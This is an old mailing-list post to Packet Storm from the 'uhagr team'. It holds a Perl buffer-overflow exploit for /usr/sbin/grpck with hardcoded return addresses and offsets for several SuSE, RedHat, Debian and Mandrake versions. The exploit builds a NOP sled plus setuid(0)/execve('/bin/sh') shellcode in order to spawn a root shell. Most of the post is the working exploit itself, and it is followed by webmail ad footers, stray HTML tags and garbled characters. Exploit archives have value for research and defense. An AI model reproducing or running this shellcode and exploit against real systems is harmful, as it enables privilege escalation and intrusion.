Hi packetstorm dudez! --- start here --- #!/usr/bin/perl # www.uhagr.org - ghostian@linuxmail.gr # This is only a Proof of concept. # /usr/sbin/grpck is not suid root by default. # castle:~ # /usr/sbin/grpck `perl -e 'print "X"x2900'` # Segmentation fault # castle:~ # my $usage = < Example: ./grpck-expl.pl 1 TARGETS: [ 1 ] SuSE Linux 7.2 [ 2 ] RedHat Linux 8.0 [ 3 ] RedHat Linux 7.3 [ 4 ] RedHat Linux 7.2 [ 5 ] Debian Linux 2.2 [ 6 ] Mandrake Linux 8.2 x $target = ($ARGV[0]); $shellcode = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" . "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" . "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" . "\x80\xe8\xdc\xff\xff\xff/bin/sh"; if (!$target) { print "$usage\n"; exit; } if ($target eq '1') { $ret = 0xbfffe514; $offset = 940; $buf = 2900; $egg = 2000; $nop = "\x90"; print "\n Target: SuSE Linux 7.2\n"; } if ($target eq '2' ) { $ret = 0xbfffe5bc; $offset = 851; $buf = 2900; $egg = 2000; $nop = "\x90"; print "\n Target: RedHat Linux 8.0\n"; } if ($target eq '3' ) { $ret = 0xbfffef94; $offset = 1812; $buf = 2900; $egg = 2000; $nop = "\x90"; print "\n Target: RedHat Linux 7.3\n"; } if ($target eq '4' ) { $ret = 0xbfffe73c; $offset = 645; $buf = 2900; $egg = 2000; $nop = "\x90"; print "\n Target: RedHat Linux 7.2\n"; } if ($target eq '5' ) { $ret = 0xbfffe934; $offset = 1541; $buf = 2900; $egg = 2000; $nop = "\x90"; print "\n Target: Debian Linux 3.0r0\n"; } if ($target eq '6' ) { $ret = 0xbffff0ae; $offset = 1859; $buf = 2900; $egg = 2000; $nop = "\x90"; print "\n Target: Mandrake Linux 8.2\n"; } $addr = pack('l', ($ret + $offset)); for ($i = 0; $i < $buf; $i += 4) { $buffer .= $addr; } for ($i = 0; $i < ($egg - length($shellcode) - 100); $i++) { $buffer .= $nop; } $buffer .= $shellcode; print "r00t?\n"; exec("/usr/sbin/grpck", $buffer,0); # Have a nice night ;] --- cut here --- Thanks! The uhagr team _____________________________________________________________ Sign up for FREE email from LinuxMail.gr at http://www.linuxmail.gr Powered by LinuxFreaks.gr _____________________________________________________________ Select your own custom email address for FREE! Get you@yourchoice.com w/No Ads, 6MB, POP & more! http://www.everyone.net/selectmail?campaign=tag
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß